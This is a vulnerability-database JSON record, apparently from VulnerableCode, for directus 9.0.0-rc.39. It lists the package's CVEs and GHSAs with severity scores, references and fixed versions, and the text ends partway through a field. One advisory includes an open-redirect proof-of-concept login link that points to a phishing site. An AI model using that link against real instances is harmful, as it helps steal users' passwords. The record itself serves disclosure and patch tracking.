{"url":"http://public2.vulnerablecode.io/api/packages/523695?format=json","purl":"pkg:npm/directus@9.0.0-rc.39","type":"npm","namespace":"","name":"directus","version":"9.0.0-rc.39","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"11.17.0","latest_non_vulnerable_version":"11.17.0","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/15447?format=json","vulnerability_id":"VCID-1hn2-pjm6-dyhj","summary":"Duplicate\nThis advisory duplicates another.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-26969","reference_id":"","reference_type":"","scores":[{"value":"0.00909","scoring_system":"epss","scoring_elements":"0.76152","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-26969"},{"reference_url":"https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/"}],"url":"https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/blob/8daed9c41baeaf1d08c1e292bf9f0dcef65e48fb/docs/configuration/config-options.md","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/"}],"url":"https://github.com/directus/directus/blob/8daed9c41baeaf1d08c1e292bf9f0dcef65e48fb/docs/configuration/config-options.md"},{"reference_url":"https://github.com/directus/directus/pull/12022","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/"}],"url":"https://github.com/directus/directus/pull/12022"},{"reference_url":"https://github.com/directus/directus/releases/tag/v9.7.0","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/"}],"url":"https://github.com/directus/directus/releases/tag/v9.7.0"},{"reference_url":"https://security.snyk.io/vuln/SNYK-JS-DIRECTUS-2441822","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/"}],"url":"https://security.snyk.io/vuln/SNYK-JS-DIRECTUS-2441822"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-26969","reference_id":"CVE-2022-26969","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-26969"},{"reference_url":"https://github.com/advisories/GHSA-g27j-74fp-xfpr","reference_id":"GHSA-g27j-74fp-xfpr","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g27j-74fp-xfpr"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-g27j-74fp-xfpr","reference_id":"GHSA-g27j-74fp-xfpr","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/security/advisories/GHSA-g27j-74fp-xfpr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/60235?format=json","purl":"pkg:npm/directus@9.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cgw-zr3k-3fen"},{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8r4e-a1vf-9bd9"},{"vulnerability":"VCID-9gba-zszk-p3h6"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-ejme-tqn4-byhk"},{"vulnerability":"VCID-et4m-8y15-9fb9"},{"vulnerability":"VCID-eygf-cb4y-hqd3"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gjju-tu4e-gqfc"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-hrqc-8err-4fbx"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-szny-2sbf-v7de"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-v4vz-smcx-gygb"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.7.0"}],"aliases":["CVE-2022-26969","GHSA-g27j-74fp-xfpr","GMS-2022-677"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1hn2-pjm6-dyhj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19657?format=json","vulnerability_id":"VCID-3cgw-zr3k-3fen","summary":"Session Token in URL in directus\n### Impact\n\nWhen reaching the /files page, a JWT is passed via GET request. Inclusion of session tokens in URLs poses a security risk as URLs are often logged in various places (e.g., web server logs, browser history). Attackers gaining access to these logs may hijack active user sessions, leading to unauthorized access to sensitive information or actions on behalf of the user.\n\n### Patches\n\n_Has the problem been patched? What versions should users upgrade to?_\n\n### Workarounds\n\nThere's no workaround available.\n\n### References\n\n_Are there any links users can visit to find out more?_","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28238","reference_id":"","reference_type":"","scores":[{"value":"0.0009","scoring_system":"epss","scoring_elements":"0.2556","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28238"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28238","reference_id":"CVE-2024-28238","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28238"},{"reference_url":"https://github.com/advisories/GHSA-2ccr-g2rv-h677","reference_id":"GHSA-2ccr-g2rv-h677","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2ccr-g2rv-h677"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-2ccr-g2rv-h677","reference_id":"GHSA-2ccr-g2rv-h677","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-02T19:50:33Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-2ccr-g2rv-h677"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/68163?format=json","purl":"pkg:npm/directus@10.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7fzh-j76t-5kd3"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8uym-xka8-cybb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-m5ng-dsfx-6qev"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.10.0"}],"aliases":["CVE-2024-28238","GHSA-2ccr-g2rv-h677"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3cgw-zr3k-3fen"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330172?format=json","vulnerability_id":"VCID-3kmj-b584-9ubg","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35412","reference_id":"","reference_type":"","scores":[{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02565","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35412"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-qqmv-5p3g-px89","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T16:23:08Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-qqmv-5p3g-px89"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35412","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35412"},{"reference_url":"https://github.com/advisories/GHSA-qqmv-5p3g-px89","reference_id":"GHSA-qqmv-5p3g-px89","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qqmv-5p3g-px89"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188455?format=json","purl":"pkg:npm/directus@11.16.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1"}],"aliases":["CVE-2026-35412","GHSA-qqmv-5p3g-px89"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3kmj-b584-9ubg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330196?format=json","vulnerability_id":"VCID-5qx9-76s2-6qfw","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35442","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04967","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35442"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-38hg-ww64-rrwc","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-07T13:30:05Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-38hg-ww64-rrwc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35442","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35442"},{"reference_url":"https://github.com/advisories/GHSA-38hg-ww64-rrwc","reference_id":"GHSA-38hg-ww64-rrwc","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-38hg-ww64-rrwc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188807?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["CVE-2026-35442","GHSA-38hg-ww64-rrwc"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5qx9-76s2-6qfw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/20791?format=json","vulnerability_id":"VCID-7zt3-dcnm-hqfb","summary":"Directus has Improper Permission Handling on Deleted Fields\nDirectus does not properly clean up field-level permissions when a field is deleted. If a new field with the same name is created later, the system automatically re-applies the old permissions, which can lead to unauthorized access.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64746","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12679","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64746"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/84d7636969083387164ce5d2fd15a65e11e2d0b8","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:18:13Z/"}],"url":"https://github.com/directus/directus/commit/84d7636969083387164ce5d2fd15a65e11e2d0b8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64746","reference_id":"CVE-2025-64746","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64746"},{"reference_url":"https://github.com/advisories/GHSA-9x5g-62gj-wqf2","reference_id":"GHSA-9x5g-62gj-wqf2","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9x5g-62gj-wqf2"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-9x5g-62gj-wqf2","reference_id":"GHSA-9x5g-62gj-wqf2","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:18:13Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-9x5g-62gj-wqf2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/70180?format=json","purl":"pkg:npm/directus@11.13.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0"}],"aliases":["CVE-2025-64746","GHSA-9x5g-62gj-wqf2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7zt3-dcnm-hqfb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19659?format=json","vulnerability_id":"VCID-8r4e-a1vf-9bd9","summary":"URL Redirection to Untrusted Site in OAuth2/OpenID in directus\n### Summary\nThe authentication API has a `redirect` parameter that can be exploited as an open redirect vulnerability as the user tries to log in via the API URL https://docs.directus.io/reference/authentication.html#login-using-sso-providers /auth/login/google?redirect for example.\n\n### Details\nThere's a redirect that is done after successful login via the Auth API GET request to `directus/auth/login/google?redirect=http://malicious-fishing-site.com`, which I think is here: https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L394. While credentials don't seem to be passed to the attacker site, the user can be phished into clicking a legitimate directus site and be taken to a malicious site made to look like a an error message \"Your password needs to be updated\" to phish out the current password.\n\n### PoC\nTurn on any auth provider in Directus instance. Form a link to `directus-instance/auth/login/:provider_id?redirect=http://malicious-fishing-site.com`, login and get taken to malicious-site. Tested on the `ory` OAuth2 integration.\n\n### Impact\nUsers who login via OAuth2 into Directus.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28239","reference_id":"","reference_type":"","scores":[{"value":"0.0023","scoring_system":"epss","scoring_elements":"0.45793","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28239"},{"reference_url":"https://docs.directus.io/reference/authentication.html#login-using-sso-providers","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-13T16:10:42Z/"}],"url":"https://docs.directus.io/reference/authentication.html#login-using-sso-providers"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/5477d7d61babd7ffc2f835d399bf79611b15b203","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-13T16:10:42Z/"}],"url":"https://github.com/directus/directus/commit/5477d7d61babd7ffc2f835d399bf79611b15b203"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28239","reference_id":"CVE-2024-28239","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28239"},{"reference_url":"https://github.com/advisories/GHSA-fr3w-2p22-6w7p","reference_id":"GHSA-fr3w-2p22-6w7p","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fr3w-2p22-6w7p"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-fr3w-2p22-6w7p","reference_id":"GHSA-fr3w-2p22-6w7p","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-13T16:10:42Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-fr3w-2p22-6w7p"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/68163?format=json","purl":"pkg:npm/directus@10.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7fzh-j76t-5kd3"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8uym-xka8-cybb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-m5ng-dsfx-6qev"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.10.0"}],"aliases":["CVE-2024-28239","GHSA-fr3w-2p22-6w7p"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8r4e-a1vf-9bd9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/201052?format=json","vulnerability_id":"VCID-9gba-zszk-p3h6","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-36031","reference_id":"","reference_type":"","scores":[{"value":"0.0026","scoring_system":"epss","scoring_elements":"0.495","published_at":"202